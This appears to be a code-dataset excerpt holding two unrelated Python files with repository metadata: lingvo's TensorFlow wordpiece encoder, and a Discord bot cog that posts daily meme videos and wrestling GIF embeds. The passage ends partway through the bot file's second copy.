|
lingvo/core/wpm_encoder.py
|
pizzahan/lingvo
|
9b85b7ba5d037701302efa807841c05223bc7d1d
|
[
"Apache-2.0"
] | 4
|
2019-06-08T00:19:06.000Z
|
2020-08-03T16:28:53.000Z
|
lingvo/core/wpm_encoder.py
|
pizzahan/lingvo
|
9b85b7ba5d037701302efa807841c05223bc7d1d
|
[
"Apache-2.0"
] | null | null | null |
lingvo/core/wpm_encoder.py
|
pizzahan/lingvo
|
9b85b7ba5d037701302efa807841c05223bc7d1d
|
[
"Apache-2.0"
] | 5
|
2018-12-11T08:05:16.000Z
|
2020-05-30T03:40:13.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Encode using wordpiece models.
Implements the segmentation algorithm described in the last paragraph of
p. 5150, in the following publication:
M. Schuster and K. Nakajima, "Japanese and Korean voice
search," 2012 IEEE International Conference on Acoustics,
Speech and Signal Processing, 2012
https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/37842.pdf
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import tensorflow as tf
from lingvo.core.ops import py_x_ops
# Must be a large ID.
# NOTE(review): by operator precedence this evaluates to 1 << (31 - 1) == 2**30,
# not (1 << 31) - 1 as the spelling suggests. It still fits in int32 and sits
# far above any realistic vocabulary size, so it works as an "invalid token"
# sentinel — but confirm which value was intended before changing it.
NO_TOKEN = 1 << 31 - 1
NO_TOKEN_STRING = '<unk>'
# Sentence boundary marker strings expected to exist in the vocabulary.
SENTENCE_START_STRING = '<s>'
SENTENCE_END_STRING = '</s>'
# Marker prepended to each word to denote a word boundary (U+2581).
BOW_STR = '▁'
class WpmEncoder(object):
  """Wordpiece tokenizer operating on TF string/int32 tensors.

  Encoding greedily merges adjacent pieces (Schuster & Nakajima, 2012); all
  ops build TF graph nodes rather than running eagerly.
  """

  def __init__(self, wpm_filepath, merge_prob=1.):
    """Create a WPM encoder.

    Args:
      wpm_filepath: a path to the file containing the vocabulary.
      merge_prob: the probability of merging tokens while encoding.
    """
    # Load vocabulary file.
    # Each line is "<piece>\t...": only the first tab-separated column is kept.
    self._pieces = []
    with tf.gfile.Open(wpm_filepath, 'r') as f:
      for line in f.readlines():
        line = line.decode('utf-8')
        piece = line.strip().split('\t')[0]
        self._pieces.append(piece)
    self._merge_prob = merge_prob

  def _TokenToString(self, token):
    # Map wordpiece id(s) back to their string form.
    return py_x_ops.vocab_id_to_token(token, vocab=self._pieces)

  def _StringToToken(self, tokstr):
    # Map string(s) to wordpiece ids; strings not in the vocab map to NO_TOKEN.
    return tf.where(
        py_x_ops.token_in_vocab(tokstr, vocab=self._pieces),
        py_x_ops.vocab_token_to_id(tokstr, vocab=self._pieces),
        tf.broadcast_to(NO_TOKEN, tf.shape(tokstr)))

  def _MergeTokens(self, tokens):
    # Id of the concatenation of two adjacent pieces (NO_TOKEN if absent).
    return self._StringToToken(
        self._TokenToString(tokens[0]) + self._TokenToString(tokens[1]))

  def _EncodeToIds(self, word):
    # Below:
    # * a token is a wordpiece ID.
    # * the tokens array will be merged in-place.
    # * the candidates array is an array of size len(tokens) - 1.
    # It contains the token for the merged wordpiece, if it exists,
    # -1 otherwise. For instance, candidate[3] = id(token[3] + token[4]).
    # First, split into basic UTF-8 characters (letters).
    chars = tf.strings.unicode_split(word, 'UTF-8')
    tokens = self._StringToToken(chars)
    tokens = tf.where(
        tf.equal(tokens, NO_TOKEN),
        # Unseen character.
        tf.broadcast_to(self.unk_id, tf.shape(tokens)),
        tokens)
    # Create initial candidate list.
    candidates = tf.map_fn(
        self._MergeTokens, (tokens[:-1], tokens[1:]), dtype=tokens.dtype)

    def _ShouldMerge(unused_tokens, candidates):
      """Merge until not possible, or we abort early according to merge_prob."""
      return tf.logical_and(
          tf.reduce_any(tf.not_equal(candidates, NO_TOKEN)),
          tf.random.uniform([]) < self._merge_prob)

    def _MergeOneToken(tokens, i):
      # Candidate id for the (i, i+1) pair, shaped [1] for concatenation.
      return tf.expand_dims(
          self._MergeTokens((tokens[i], tokens[i + 1])), axis=-1)

    def _MergeCandidates(tokens, candidates):
      """Merge in the reverse binary tree."""
      # argmin picks the pair whose merged piece has the smallest vocab id;
      # NO_TOKEN is huge, so un-mergeable pairs are never selected.
      best_id = tf.argmin(candidates, output_type=tf.int32)
      # Perform the merge at position best_id.
      tokens = tf.concat(
          [tokens[:best_id], [candidates[best_id]], tokens[best_id + 2:]],
          axis=0)
      # Recompute the merge candidates.
      # Only the neighbors of best_id need to be recomputed.
      empty = tf.zeros([0], dtype=candidates.dtype)

      def _MergeLeft():
        return tf.concat(
            [candidates[:best_id - 1],
             _MergeOneToken(tokens, best_id - 1)],
            axis=0)

      # No left neighbor when the merge happened at position 0.
      left_candidates = tf.cond(tf.equal(best_id, 0), lambda: empty, _MergeLeft)

      def _MergeRight():
        return tf.concat(
            [_MergeOneToken(tokens, best_id), candidates[best_id + 2:]], axis=0)

      # No right neighbor when the merge consumed the last pair.
      right_candidates = tf.cond(
          tf.greater_equal(best_id,
                           tf.size(tokens) - 1), lambda: empty, _MergeRight)
      candidates = tf.concat([left_candidates, right_candidates], axis=0)
      return tokens, candidates

    return tf.while_loop(
        _ShouldMerge,
        _MergeCandidates, (tokens, candidates),
        parallel_iterations=1,
        back_prop=False)[0]

  def Encode(self, text):
    """Converts string `text` to integer ids and the encoded string.

    Encoding includes prefixing the beginning-of-word token to each word.

    Returns:
      ids: the encoded integer ids.
      tokens: the encoded string.
    """
    # Whitespace-split into words; each word is encoded independently.
    words = tf.sparse.to_dense(tf.strings.split([text]), default_value='')[0]
    num_words = tf.size(words)
    ids_ta = tf.TensorArray(tf.int32, 0, dynamic_size=True)

    def _WordsToIds(i, words, ids_ta):
      encoded_ids = self._EncodeToIds(BOW_STR + words[i])
      # Append this word's ids at the current end of the array.
      ids_ta = ids_ta.scatter(
          tf.range(ids_ta.size(),
                   ids_ta.size() + tf.size(encoded_ids)), encoded_ids)
      return i + 1, words, ids_ta

    _, _, ids_ta = tf.while_loop(
        lambda i, *_: i < num_words,
        _WordsToIds,
        loop_vars=(tf.constant(0, tf.int32), words, ids_ta),
        parallel_iterations=30,
        back_prop=False)
    ids = ids_ta.stack()
    return ids, self._TokenToString(ids)

  def Decode(self, ids):
    """Converts integer ids back to a whitespace-joined text string."""
    txt = tf.strings.reduce_join(self._TokenToString(ids))
    # Beginning-of-word markers become the word separators.
    txt = tf.strings.regex_replace(txt, BOW_STR, ' ')
    # Note that this strips spaces from the end of the input as well.
    # We assume no inputs rely on the existence of trailing whitespace.
    txt = tf.strings.strip(txt)
    return txt

  @property
  def sentence_start_id(self):
    # Raises ValueError if '<s>' is missing from the vocabulary.
    return self._pieces.index(SENTENCE_START_STRING)

  @property
  def sentence_start_string(self):
    return SENTENCE_START_STRING

  @property
  def sentence_end_id(self):
    # Raises ValueError if '</s>' is missing from the vocabulary.
    return self._pieces.index(SENTENCE_END_STRING)

  @property
  def sentence_end_string(self):
    return SENTENCE_END_STRING

  @property
  def unk_id(self):
    # Raises ValueError if '<unk>' is missing from the vocabulary.
    return self._pieces.index(NO_TOKEN_STRING)
| 33.104478
| 89
| 0.666366
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import tensorflow as tf
from lingvo.core.ops import py_x_ops
NO_TOKEN = 1 << 31 - 1
NO_TOKEN_STRING = '<unk>'
SENTENCE_START_STRING = '<s>'
SENTENCE_END_STRING = '</s>'
BOW_STR = '▁'
class WpmEncoder(object):
def __init__(self, wpm_filepath, merge_prob=1.):
self._pieces = []
with tf.gfile.Open(wpm_filepath, 'r') as f:
for line in f.readlines():
line = line.decode('utf-8')
piece = line.strip().split('\t')[0]
self._pieces.append(piece)
self._merge_prob = merge_prob
def _TokenToString(self, token):
return py_x_ops.vocab_id_to_token(token, vocab=self._pieces)
def _StringToToken(self, tokstr):
return tf.where(
py_x_ops.token_in_vocab(tokstr, vocab=self._pieces),
py_x_ops.vocab_token_to_id(tokstr, vocab=self._pieces),
tf.broadcast_to(NO_TOKEN, tf.shape(tokstr)))
def _MergeTokens(self, tokens):
return self._StringToToken(
self._TokenToString(tokens[0]) + self._TokenToString(tokens[1]))
def _EncodeToIds(self, word):
chars = tf.strings.unicode_split(word, 'UTF-8')
tokens = self._StringToToken(chars)
tokens = tf.where(
tf.equal(tokens, NO_TOKEN),
tf.broadcast_to(self.unk_id, tf.shape(tokens)),
tokens)
candidates = tf.map_fn(
self._MergeTokens, (tokens[:-1], tokens[1:]), dtype=tokens.dtype)
def _ShouldMerge(unused_tokens, candidates):
return tf.logical_and(
tf.reduce_any(tf.not_equal(candidates, NO_TOKEN)),
tf.random.uniform([]) < self._merge_prob)
def _MergeOneToken(tokens, i):
return tf.expand_dims(
self._MergeTokens((tokens[i], tokens[i + 1])), axis=-1)
def _MergeCandidates(tokens, candidates):
best_id = tf.argmin(candidates, output_type=tf.int32)
tokens = tf.concat(
[tokens[:best_id], [candidates[best_id]], tokens[best_id + 2:]],
axis=0)
empty = tf.zeros([0], dtype=candidates.dtype)
def _MergeLeft():
return tf.concat(
[candidates[:best_id - 1],
_MergeOneToken(tokens, best_id - 1)],
axis=0)
left_candidates = tf.cond(tf.equal(best_id, 0), lambda: empty, _MergeLeft)
def _MergeRight():
return tf.concat(
[_MergeOneToken(tokens, best_id), candidates[best_id + 2:]], axis=0)
right_candidates = tf.cond(
tf.greater_equal(best_id,
tf.size(tokens) - 1), lambda: empty, _MergeRight)
candidates = tf.concat([left_candidates, right_candidates], axis=0)
return tokens, candidates
return tf.while_loop(
_ShouldMerge,
_MergeCandidates, (tokens, candidates),
parallel_iterations=1,
back_prop=False)[0]
def Encode(self, text):
words = tf.sparse.to_dense(tf.strings.split([text]), default_value='')[0]
num_words = tf.size(words)
ids_ta = tf.TensorArray(tf.int32, 0, dynamic_size=True)
def _WordsToIds(i, words, ids_ta):
encoded_ids = self._EncodeToIds(BOW_STR + words[i])
ids_ta = ids_ta.scatter(
tf.range(ids_ta.size(),
ids_ta.size() + tf.size(encoded_ids)), encoded_ids)
return i + 1, words, ids_ta
_, _, ids_ta = tf.while_loop(
lambda i, *_: i < num_words,
_WordsToIds,
loop_vars=(tf.constant(0, tf.int32), words, ids_ta),
parallel_iterations=30,
back_prop=False)
ids = ids_ta.stack()
return ids, self._TokenToString(ids)
def Decode(self, ids):
txt = tf.strings.reduce_join(self._TokenToString(ids))
txt = tf.strings.regex_replace(txt, BOW_STR, ' ')
txt = tf.strings.strip(txt)
return txt
@property
def sentence_start_id(self):
return self._pieces.index(SENTENCE_START_STRING)
@property
def sentence_start_string(self):
return SENTENCE_START_STRING
@property
def sentence_end_id(self):
return self._pieces.index(SENTENCE_END_STRING)
@property
def sentence_end_string(self):
return SENTENCE_END_STRING
@property
def unk_id(self):
return self._pieces.index(NO_TOKEN_STRING)
| true
| true
|
f705a1659e4db8d71a128447488a338279e58453
| 10,720
|
py
|
Python
|
cogs/gachiGASM.py
|
s0hvaperuna/Not-a-bot
|
933ae57e70a5c98fed6800205595af21bbf1a10e
|
[
"MIT"
] | 4
|
2017-03-08T13:38:43.000Z
|
2018-08-03T13:42:17.000Z
|
cogs/gachiGASM.py
|
s0hvaperuna/Not-a-bot
|
933ae57e70a5c98fed6800205595af21bbf1a10e
|
[
"MIT"
] | 3
|
2018-08-03T13:14:25.000Z
|
2018-10-02T16:22:04.000Z
|
cogs/gachiGASM.py
|
s0hvaperuna/Not-a-bot
|
933ae57e70a5c98fed6800205595af21bbf1a10e
|
[
"MIT"
] | 4
|
2017-04-08T23:22:00.000Z
|
2018-10-01T12:15:36.000Z
|
import logging
import os
import traceback
from datetime import datetime, time, timezone
from random import Random, choice
import disnake
from disnake.ext import tasks
from disnake.ext.commands import BucketType, cooldown, guild_only
from bot.bot import command, group, has_permissions
from bot.globals import PLAYLISTS
from cogs.cog import Cog
from utils.utilities import read_lines
logger = logging.getLogger('terminal')
class WrestlingGif:
    """A wrestling GIF paired with a caption template.

    The template may reference ``{author}`` and ``{recipient}``
    (typically via ``{author.name}`` / ``{recipient.name}``).
    """

    def __init__(self, url, text):
        self.url = url
        self.text = text

    def build_embed(self, author, recipient):
        """Return an embed showing the GIF captioned for the given pair."""
        embed = disnake.Embed(
            description=self.text.format(author=author, recipient=recipient))
        embed.set_image(url=self.url)
        return embed
wrestling_gifs = [
WrestlingGif('https://i.imgur.com/xUi2Vq1.gif', "**{recipient.name}** tries to grab but it fails. **{author.name}** grabs **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/osDWTHG.gif', "**{recipient.name}** tries to escape but **{author.name}** pins them down"),
WrestlingGif('https://i.imgur.com/HS6R463.gif', "**{author.name}** lifts **{recipient.name}** up. **{recipient.name}** is powerless to do anything"),
WrestlingGif('https://i.imgur.com/jbE2XVt.gif', "**{author.name}** challenges **{recipient.name}** to a friendly wrestling match"),
WrestlingGif('https://i.imgur.com/XVUjH9x.gif', "**{recipient.name}** tries to attack but **{author.name}** counters"),
WrestlingGif('https://i.imgur.com/vTeoYAE.gif', "**{author.name}** and **{recipient.name}** engage in a battle of strength"),
WrestlingGif('https://i.imgur.com/iu2kiVy.gif', "**{author.name}** gets a hold of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/BulkVW1.gif', "**{author.name}** gets **{recipient.name}** with a knee strike"),
WrestlingGif('https://i.imgur.com/zXaIYLp.gif', "**{author.name}** beats **{recipient.name}** down"),
WrestlingGif('https://i.imgur.com/XNOMUcg.gif', "**{author.name}** delivers a low blow to **{recipient.name}**. Nasty strategy"),
WrestlingGif('https://i.imgur.com/oSG0V6a.gif', "**{recipient.name}** gets beaten by **{author.name}**"),
WrestlingGif('https://i.imgur.com/u0H0ZSA.gif', "**{author.name}** grabs **{recipient.name}**s fucking pants <:GWjojoGachiGASM:363025405562585088>"),
WrestlingGif('https://i.imgur.com/VFruiTR.gif', "**{author.name}** flexes on **{recipient.name}** after kicking their ass. WOO"),
WrestlingGif('https://i.imgur.com/YCd1aSo.gif', "**{author.name}** beats **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/M3sAu23.gif', "**{author.name}** chokes **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/inEROy3.gif', "**{author.name}** throws **{recipient.name}** on the ground"),
WrestlingGif('https://i.imgur.com/8qI8f1M.gif', "**{author.name}** battles **{recipient.name}** in a feat of pure strength"),
WrestlingGif('https://i.imgur.com/xhVIjIt.gif', "**{author.name}** lifts **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/RW07zr0.gif', "**{author.name}** escapes the choke of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/g6wVGpG.gif', "**{author.name}** escapes **{recipient.name}**s grab and begins a counter-attack"),
WrestlingGif('https://i.imgur.com/LKHtUeo.gif', "**{author.name}** gets a hold of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/eCCAKoA.gif', "It's time to wrestle"),
WrestlingGif('https://i.imgur.com/ZFiT5Ew.gif', "**{author.name}** lifts **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/A4Oo0Tp.gif', "**{author.name}** puts **{recipient.name}** down"),
WrestlingGif('https://i.imgur.com/COQlI5t.gif', "**{author.name}** swaps positions with **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/pIaErDy.gif', "**{author.name}** pulls **{recipient.name}**s arms"),
WrestlingGif('https://i.imgur.com/hThhSrl.gif', "**{author.name}** locks **{recipient.name}**s leg"),
WrestlingGif('https://i.imgur.com/goMZvRE.gif', "**{author.name}** turns the tables on **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/3A9eMu0.gif', "**{author.name}** slams **{recipient.name}** on the floor"),
WrestlingGif('https://i.imgur.com/G9Iklxu.gif', "**{author.name}** and **{recipient.name}** are in the middle of an intense battle"),
WrestlingGif('https://i.imgur.com/c1CQBnJ.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/cKcOJo0.gif', "**{author.name}** pulls **{recipient.name}**s leg"),
WrestlingGif('https://i.imgur.com/Q41oEne.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/AP7MRnF.gif', "**{author.name}** escapes the hold of **{recipient.name}** and is ready for more"),
WrestlingGif('https://i.imgur.com/6khggL1.gif', "**{author.name}** pulls the hair of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/bq0Bjbl.gif', "**{author.name}** got the moves"),
WrestlingGif('https://i.imgur.com/aIVoytr.gif', "**{author.name}** throws **{recipient.name}** on the ground"),
WrestlingGif('https://i.imgur.com/l137Zzh.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/tFZv2j9.gif', "**{recipient.name}** and **{author.name}** engage in a fight. **{author.name}** makes the first move"),
WrestlingGif('https://i.imgur.com/kVXjE3Q.gif', "**{author.name}** pulls **{recipient.name}**'s hands"),
WrestlingGif('https://i.imgur.com/4IsfXSD.gif', "**{author.name}** has **{recipient.name}** locked down"),
WrestlingGif('https://i.imgur.com/HnLRl26.gif', "**{author.name}** spins **{recipient.name}** right round baby right round"),
WrestlingGif('https://i.imgur.com/uJtuZ4V.gif', "**{author.name}** beats **{recipient.name}** up and locks him down"),
WrestlingGif('https://i.imgur.com/ZgXNVIb.gif', "**{recipient.name}** flails his arms around helplessly"),
WrestlingGif('https://i.imgur.com/Jcu4NyL.gif', "**{author.name}** manages to get a quick jab in at **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/XUpxidH.gif', "**{author.name}** pulls on **{recipient.name}**'s leg"),
WrestlingGif('https://i.imgur.com/pTBy6ap.gif', "**{recipient.name}** and **{author.name}** engage in a hugging competition"),
WrestlingGif('https://i.imgur.com/ggTj4xI.gif', "**{author.name}** escapes **{recipient.name}**'s hold and counters"),
WrestlingGif('https://i.imgur.com/lS2zZre.gif', "**{author.name}** locks **{recipient.name}**'s legs"),
WrestlingGif('https://i.imgur.com/fdgI1Br.gif', "**{recipient.name}** gets choked by **{author.name}** and tries to escape but fails"),
]
class gachiGASM(Cog):
def __init__(self, bot):
super().__init__(bot)
self.gachilist = self.bot.gachilist
if not self.gachilist:
self.reload_gachilist()
self._start_task = self._reload_and_post.start()
logger.info(f'Starting gachi loop.\n{"".join(traceback.format_stack()[-8:])}')
def cog_unload(self):
self._reload_and_post.cancel()
@tasks.loop(time=time(tzinfo=timezone.utc), reconnect=False)
async def _reload_and_post(self):
logger.info(f'Start task is {self._start_task}, '
f'current task is {self._reload_and_post.get_task()}, '
f'fail status: {self._reload_and_post._last_iteration_failed}, '
f'next iter {self._reload_and_post.next_iteration}.\n{"".join(traceback.format_stack()[-8:])}')
self.reload_gachilist()
for guild in self.bot.guilds:
channel = self.bot.guild_cache.dailygachi(guild.id)
if not channel:
continue
channel = guild.get_channel(channel)
if not channel:
continue
vid = Random(self.get_day()+guild.id).choice(self.gachilist)
try:
await channel.send(f'Daily gachi {vid}')
except disnake.HTTPException:
pass
def reload_gachilist(self):
self.bot.gachilist = read_lines(os.path.join(PLAYLISTS, 'gachi.txt'))
self.gachilist = self.bot.gachilist
@staticmethod
def get_day():
return (datetime.utcnow() - datetime.min).days
@command()
@cooldown(1, 2, BucketType.channel)
async def gachify(self, ctx, *, words):
"""Gachify a string"""
if ' ' not in words:
# We need to undo the string view or it will skip the first word
ctx.view.undo()
await self.gachify2.invoke(ctx)
else:
return await ctx.send(words.replace(' ', r' \♂ ').upper()[:2000])
@command()
@cooldown(1, 2, BucketType.channel)
async def gachify2(self, ctx, *, words):
"""An alternative way of gachifying"""
s = r'\♂ ' + words.replace(' ', r' \♂ ').upper() + r' \♂'
return await ctx.send(s[:2000])
@command(aliases=['rg'])
@cooldown(1, 5, BucketType.channel)
async def randomgachi(self, ctx):
await ctx.send(choice(self.gachilist))
@group(invoke_without_command=True, aliases=['dg'])
@guild_only()
@cooldown(1, 5, BucketType.channel)
async def dailygachi(self, ctx):
await ctx.send(Random(self.get_day()+ctx.guild.id).choice(self.gachilist))
@dailygachi.command(np_pm=True)
@cooldown(1, 5)
@has_permissions(manage_guild=True)
async def subscribe(self, ctx, *, channel: disnake.TextChannel=None):
if channel:
await self.bot.guild_cache.set_dailygachi(ctx.guild.id, channel.id)
return await ctx.send(f'New dailygachi channel set to {channel}')
channel = self.bot.guild_cache.dailygachi(ctx.guild.id)
channel = ctx.guild.get_channel(channel)
if channel:
await ctx.send(f'Current dailygachi channel is {channel}')
else:
await ctx.send('No dailygachi channel set')
@dailygachi.command()
@cooldown(1, 5)
@has_permissions(manage_guild=True)
@guild_only()
async def unsubscribe(self, ctx):
await self.bot.guild_cache.set_dailygachi(ctx.guild.id, None)
await ctx.send('Dailygachi channel no longer set')
@command()
@cooldown(1, 5, BucketType.member)
@guild_only()
async def wrestle(self, ctx, *, user: disnake.User):
if user == ctx.author:
await ctx.send('Wrestling against yourself...')
return
wrestling_gif = choice(wrestling_gifs)
await ctx.send(embed=wrestling_gif.build_embed(ctx.author, user))
def setup(bot):
bot.add_cog(gachiGASM(bot))
| 54.416244
| 156
| 0.648601
|
import logging
import os
import traceback
from datetime import datetime, time, timezone
from random import Random, choice
import disnake
from disnake.ext import tasks
from disnake.ext.commands import BucketType, cooldown, guild_only
from bot.bot import command, group, has_permissions
from bot.globals import PLAYLISTS
from cogs.cog import Cog
from utils.utilities import read_lines
logger = logging.getLogger('terminal')
class WrestlingGif:
def __init__(self, url, text):
self.url = url
self.text = text
def build_embed(self, author, recipient):
description = self.text.format(author=author, recipient=recipient)
embed = disnake.Embed(description=description)
embed.set_image(url=self.url)
return embed
wrestling_gifs = [
WrestlingGif('https://i.imgur.com/xUi2Vq1.gif', "**{recipient.name}** tries to grab but it fails. **{author.name}** grabs **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/osDWTHG.gif', "**{recipient.name}** tries to escape but **{author.name}** pins them down"),
WrestlingGif('https://i.imgur.com/HS6R463.gif', "**{author.name}** lifts **{recipient.name}** up. **{recipient.name}** is powerless to do anything"),
WrestlingGif('https://i.imgur.com/jbE2XVt.gif', "**{author.name}** challenges **{recipient.name}** to a friendly wrestling match"),
WrestlingGif('https://i.imgur.com/XVUjH9x.gif', "**{recipient.name}** tries to attack but **{author.name}** counters"),
WrestlingGif('https://i.imgur.com/vTeoYAE.gif', "**{author.name}** and **{recipient.name}** engage in a battle of strength"),
WrestlingGif('https://i.imgur.com/iu2kiVy.gif', "**{author.name}** gets a hold of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/BulkVW1.gif', "**{author.name}** gets **{recipient.name}** with a knee strike"),
WrestlingGif('https://i.imgur.com/zXaIYLp.gif', "**{author.name}** beats **{recipient.name}** down"),
WrestlingGif('https://i.imgur.com/XNOMUcg.gif', "**{author.name}** delivers a low blow to **{recipient.name}**. Nasty strategy"),
WrestlingGif('https://i.imgur.com/oSG0V6a.gif', "**{recipient.name}** gets beaten by **{author.name}**"),
WrestlingGif('https://i.imgur.com/u0H0ZSA.gif', "**{author.name}** grabs **{recipient.name}**s fucking pants <:GWjojoGachiGASM:363025405562585088>"),
WrestlingGif('https://i.imgur.com/VFruiTR.gif', "**{author.name}** flexes on **{recipient.name}** after kicking their ass. WOO"),
WrestlingGif('https://i.imgur.com/YCd1aSo.gif', "**{author.name}** beats **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/M3sAu23.gif', "**{author.name}** chokes **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/inEROy3.gif', "**{author.name}** throws **{recipient.name}** on the ground"),
WrestlingGif('https://i.imgur.com/8qI8f1M.gif', "**{author.name}** battles **{recipient.name}** in a feat of pure strength"),
WrestlingGif('https://i.imgur.com/xhVIjIt.gif', "**{author.name}** lifts **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/RW07zr0.gif', "**{author.name}** escapes the choke of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/g6wVGpG.gif', "**{author.name}** escapes **{recipient.name}**s grab and begins a counter-attack"),
WrestlingGif('https://i.imgur.com/LKHtUeo.gif', "**{author.name}** gets a hold of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/eCCAKoA.gif', "It's time to wrestle"),
WrestlingGif('https://i.imgur.com/ZFiT5Ew.gif', "**{author.name}** lifts **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/A4Oo0Tp.gif', "**{author.name}** puts **{recipient.name}** down"),
WrestlingGif('https://i.imgur.com/COQlI5t.gif', "**{author.name}** swaps positions with **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/pIaErDy.gif', "**{author.name}** pulls **{recipient.name}**s arms"),
WrestlingGif('https://i.imgur.com/hThhSrl.gif', "**{author.name}** locks **{recipient.name}**s leg"),
WrestlingGif('https://i.imgur.com/goMZvRE.gif', "**{author.name}** turns the tables on **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/3A9eMu0.gif', "**{author.name}** slams **{recipient.name}** on the floor"),
WrestlingGif('https://i.imgur.com/G9Iklxu.gif', "**{author.name}** and **{recipient.name}** are in the middle of an intense battle"),
WrestlingGif('https://i.imgur.com/c1CQBnJ.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/cKcOJo0.gif', "**{author.name}** pulls **{recipient.name}**s leg"),
WrestlingGif('https://i.imgur.com/Q41oEne.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/AP7MRnF.gif', "**{author.name}** escapes the hold of **{recipient.name}** and is ready for more"),
WrestlingGif('https://i.imgur.com/6khggL1.gif', "**{author.name}** pulls the hair of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/bq0Bjbl.gif', "**{author.name}** got the moves"),
WrestlingGif('https://i.imgur.com/aIVoytr.gif', "**{author.name}** throws **{recipient.name}** on the ground"),
WrestlingGif('https://i.imgur.com/l137Zzh.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/tFZv2j9.gif', "**{recipient.name}** and **{author.name}** engage in a fight. **{author.name}** makes the first move"),
WrestlingGif('https://i.imgur.com/kVXjE3Q.gif', "**{author.name}** pulls **{recipient.name}**'s hands"),
WrestlingGif('https://i.imgur.com/4IsfXSD.gif', "**{author.name}** has **{recipient.name}** locked down"),
WrestlingGif('https://i.imgur.com/HnLRl26.gif', "**{author.name}** spins **{recipient.name}** right round baby right round"),
WrestlingGif('https://i.imgur.com/uJtuZ4V.gif', "**{author.name}** beats **{recipient.name}** up and locks him down"),
WrestlingGif('https://i.imgur.com/ZgXNVIb.gif', "**{recipient.name}** flails his arms around helplessly"),
WrestlingGif('https://i.imgur.com/Jcu4NyL.gif', "**{author.name}** manages to get a quick jab in at **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/XUpxidH.gif', "**{author.name}** pulls on **{recipient.name}**'s leg"),
WrestlingGif('https://i.imgur.com/pTBy6ap.gif', "**{recipient.name}** and **{author.name}** engage in a hugging competition"),
WrestlingGif('https://i.imgur.com/ggTj4xI.gif', "**{author.name}** escapes **{recipient.name}**'s hold and counters"),
WrestlingGif('https://i.imgur.com/lS2zZre.gif', "**{author.name}** locks **{recipient.name}**'s legs"),
WrestlingGif('https://i.imgur.com/fdgI1Br.gif', "**{recipient.name}** gets choked by **{author.name}** and tries to escape but fails"),
]
class gachiGASM(Cog):
def __init__(self, bot):
super().__init__(bot)
self.gachilist = self.bot.gachilist
if not self.gachilist:
self.reload_gachilist()
self._start_task = self._reload_and_post.start()
logger.info(f'Starting gachi loop.\n{"".join(traceback.format_stack()[-8:])}')
def cog_unload(self):
self._reload_and_post.cancel()
@tasks.loop(time=time(tzinfo=timezone.utc), reconnect=False)
async def _reload_and_post(self):
logger.info(f'Start task is {self._start_task}, '
f'current task is {self._reload_and_post.get_task()}, '
f'fail status: {self._reload_and_post._last_iteration_failed}, '
f'next iter {self._reload_and_post.next_iteration}.\n{"".join(traceback.format_stack()[-8:])}')
self.reload_gachilist()
for guild in self.bot.guilds:
channel = self.bot.guild_cache.dailygachi(guild.id)
if not channel:
continue
channel = guild.get_channel(channel)
if not channel:
continue
vid = Random(self.get_day()+guild.id).choice(self.gachilist)
try:
await channel.send(f'Daily gachi {vid}')
except disnake.HTTPException:
pass
def reload_gachilist(self):
self.bot.gachilist = read_lines(os.path.join(PLAYLISTS, 'gachi.txt'))
self.gachilist = self.bot.gachilist
@staticmethod
def get_day():
return (datetime.utcnow() - datetime.min).days
@command()
@cooldown(1, 2, BucketType.channel)
async def gachify(self, ctx, *, words):
if ' ' not in words:
# We need to undo the string view or it will skip the first word
ctx.view.undo()
await self.gachify2.invoke(ctx)
else:
return await ctx.send(words.replace(' ', r' \♂ ').upper()[:2000])
@command()
@cooldown(1, 2, BucketType.channel)
async def gachify2(self, ctx, *, words):
s = r'\♂ ' + words.replace(' ', r' \♂ ').upper() + r' \♂'
return await ctx.send(s[:2000])
@command(aliases=['rg'])
@cooldown(1, 5, BucketType.channel)
async def randomgachi(self, ctx):
await ctx.send(choice(self.gachilist))
@group(invoke_without_command=True, aliases=['dg'])
@guild_only()
@cooldown(1, 5, BucketType.channel)
async def dailygachi(self, ctx):
await ctx.send(Random(self.get_day()+ctx.guild.id).choice(self.gachilist))
@dailygachi.command(np_pm=True)
@cooldown(1, 5)
@has_permissions(manage_guild=True)
